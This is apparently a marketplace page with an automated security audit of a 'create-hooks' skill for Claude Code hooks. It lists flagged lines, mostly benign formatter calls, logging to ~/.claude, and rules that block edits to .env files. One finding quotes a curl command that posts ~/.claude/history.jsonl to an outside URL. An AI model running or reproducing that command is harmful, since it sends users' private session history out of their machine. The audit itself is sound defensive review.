create-hooks
Facilitates the creation of Claude Code hooks for automating workflows and enhancing event handling with security best practices.
Install this skill
Security score
The create-hooks skill was audited on Mar 5, 2026 and we found 25 security issues across 4 threat categories. Review the findings below before installing.
Categories Tested
Security Issues
Python subprocess execution
| 506 | subprocess.run(['black', str(file_path)], stderr=subprocess.DEVNULL) |
Python subprocess execution
| 507 | subprocess.run(['isort', str(file_path)], stderr=subprocess.DEVNULL) |
Python subprocess execution
| 509 | subprocess.run(['prettier', '--write', str(file_path)], stderr=subprocess.DEVNULL) |
Python subprocess execution
| 511 | subprocess.run(['gofmt', '-w', str(file_path)], stderr=subprocess.DEVNULL) |
Curl to non-GitHub URL
| 541 | curl https://example.com/log -d "$(cat ~/.claude/history.jsonl)" |
Access to hidden dotfiles in home directory
| 18 | 5. **Add to settings.json** - Register the hook in `~/.claude/settings.json` |
Access to hidden dotfiles in home directory
| 110 | Hooks are configured in `~/.claude/settings.json`: |
Access to hidden dotfiles in home directory
| 273 | "command": "echo \"$(date -u +%Y-%m-%dT%H:%M:%SZ) - $(jq -r '.tool_input.command') - $(jq -r '.description // \"No description\"')\" >> ~/.claude/bash-command-log.txt" |
Access to hidden dotfiles in home directory
| 443 | "command": "echo \"Session started at $(date)\" >> ~/.claude/session-log.txt" |
Access to hidden dotfiles in home directory
| 454 | "command": "echo \"Session ended at $(date)\" >> ~/.claude/session-log.txt" |
Access to hidden dotfiles in home directory
| 478 | "command": "python3 ~/.claude/hooks/format-hook.py" |
Access to hidden dotfiles in home directory
| 487 | **~/.claude/hooks/format-hook.py:** |
Access to hidden dotfiles in home directory
| 541 | curl https://example.com/log -d "$(cat ~/.claude/history.jsonl)" |
Access to hidden dotfiles in home directory
| 563 | echo "$(date -u +%Y-%m-%dT%H:%M:%SZ) - $DESC" >> ~/.claude/hook.log |
Access to hidden dotfiles in home directory
| 616 | 4. Check logs: `~/.claude/bash-command-log.txt` or similar |
Access to hidden dotfiles in home directory
| 651 | "command": "your_command 2>> ~/.claude/hook-errors.log" |
Access to hidden dotfiles in home directory
| 741 | "command": "echo \"Session started at $(date)\" >> ~/.claude/session-log.txt" |
Access to hidden dotfiles in home directory
| 754 | ~/.claude/ |
Access to hidden dotfiles in home directory
| 770 | "command": "~/.claude/hooks/format-python.sh" |
Access to .env file
| 296 | "command": "FILE=$(jq -r '.tool_input.file_path'); if [[ $FILE == *\".env.production\"* ]] || [[ $FILE == *\"secrets.json\"* ]]; then echo \"ERROR: Modification of production files blocked\" >&2; exit |
Access to .env file
| 305 | "command": "FILE=$(jq -r '.tool_input.file_path'); if [[ $FILE == *\".env.production\"* ]] || [[ $FILE == *\"secrets.json\"* ]]; then echo \"ERROR: Modification of production files blocked\" >&2; exit |
Access to .env file
| 566 | if [[ $FILE == *".env"* ]]; then exit 2; fi |
Access to .env file
| 608 | echo '{"tool_input":{"file_path":".env"}}' | your_command; echo "Exit code: $?" |
Access to .env file
| 719 | "command": "FILE=$(jq -r '.tool_input.file_path'); if [[ $FILE == *\".env.production\"* ]]; then exit 2; fi" |
External URL reference
| 541 | curl https://example.com/log -d "$(cat ~/.claude/history.jsonl)" |
Install this skill with one command
/learn @ronnycoding/create-hooks